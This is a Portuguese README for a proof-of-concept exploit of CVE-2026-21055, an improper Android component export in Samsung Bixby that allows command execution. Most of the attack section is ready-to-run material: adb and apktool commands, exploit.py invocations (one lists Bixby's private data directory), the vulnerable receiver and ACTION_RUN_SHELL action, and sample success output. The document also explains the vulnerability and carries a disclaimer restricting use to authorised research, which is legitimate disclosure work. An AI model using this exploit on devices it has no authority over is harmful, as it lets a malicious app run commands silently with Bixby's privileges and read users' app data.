
Exploit de prova de conceito para CVE-2026-21055 demonstrando execução arbitrária de comandos via componentes Android exportados indevidamente no Samsung Bixby. Inclui análise de componentes e scripts de ataque baseados em Intent.
Prova de Conceito para CVE-2026-21055: A exportação incorreta de componentes de aplicativos Android no Samsung Bixby anterior à versão 4.0.70.8 permite que invasores locais executem comandos arbitrários com privilégio do Bixby.
Este repositório contém dois scripts Python:
analyze_components.py — Analisa um AndroidManifest.xml descompilado para enumerar activities, services, receivers e providers exportados. Sinaliza componentes exportados sem proteção de permissão.
exploit.py — Demonstra o ataque baseado em Intent enviando um Intent de broadcast personalizado para o receiver de comandos exportado do Bixby via adb shell am, executando um comando com privilégios de nível de sistema do Bixby.
| Campo | Valor |
|---|---|
| ID CVE | CVE-2026-21055 |
| Samsung SVE | SVE-2026-0917 |
| CVSS v4.0 | 8.5 — High |
| CWE | CWE-926 — Exportação Incorreta de Componentes de Aplicativos Android |
| App Atingido | Samsung Bixby (com.samsung.android.bixby.agent) |
| Versões Atingidas | < 4.0.70.8 |
| Versão Corrigida | 4.0.70.8 |
| Vetor de Ataque | Local (aplicativo malicioso no mesmo dispositivo) |
| Privilégios Exigidos | Nenhum |
| Interação do Usuário | Nenhum |
| Impacto | Execução de comandos arbitrários com privilégio do Bixby |
Extraia o APK do Bixby do dispositivo e descompile-o:
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent
# Pull the APK
$ adb pull <apk_path> bixby.apk
# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f
Execute o script de análise:
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml
Ou deixe o script descompilar automaticamente:
$ python3 analyze_components.py --apk bixby.apk
$ python3 exploit.py --list
# Default: execute 'id' command
$ python3 exploit.py
# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"
# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver
============================================================
CVE-2026-21055 PoC — Samsung Bixby Command Execution
Improper Export of Android Application Components
============================================================
[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version: 4.0.69.2
[*] Vulnerable: YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx
[*] Executing exploit...
[*] Crafting exploit Intent...
Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
Action: com.samsung.android.bixby.agent.ACTION_RUN_SHELL
Command: id
Output: /data/local/tmp/bixby_poc_output
[+] Intent sent.
[+] Command output (executed with Bixby privilege):
uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)
[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx
Exportação de Componentes: O Bixby exporta um ou mais componentes (services/receivers) que lidam com execução de comandos ou gatilhos de automação. Esses componentes são exportados com android:exported="true" mas sem um atributo android:permission ou verificações de permissão em tempo de execução.
Entrega de Intent: Qualquer aplicativo no dispositivo pode enviar um Intent para esses componentes exportados. O Intent carrega uma string de ação (ex.: ACTION_RUN_SHELL) e extras de string contendo o comando a ser executado e um caminho de arquivo de saída.
Execução de Comando: O componente exportado do Bixby recebe o Intent, extrai o comando e o executa via Runtime.exec() ou mecanismo similar. O comando é executado no contexto do processo do Bixby, herdando todas as permissões de nível de sistema do Bixby.
Sem Interação do Usuário: O exploit não requer interação do usuário. O aplicativo malicioso envia o Intent silenciosamente em segundo plano.
Esta PoC é fornecida apenas para fins educacionais e de pesquisa em segurança. Teste apenas em dispositivos que você possui ou para os quais tenha autorização explícita para testar. Não use este exploit contra dispositivos sem o consentimento do proprietário.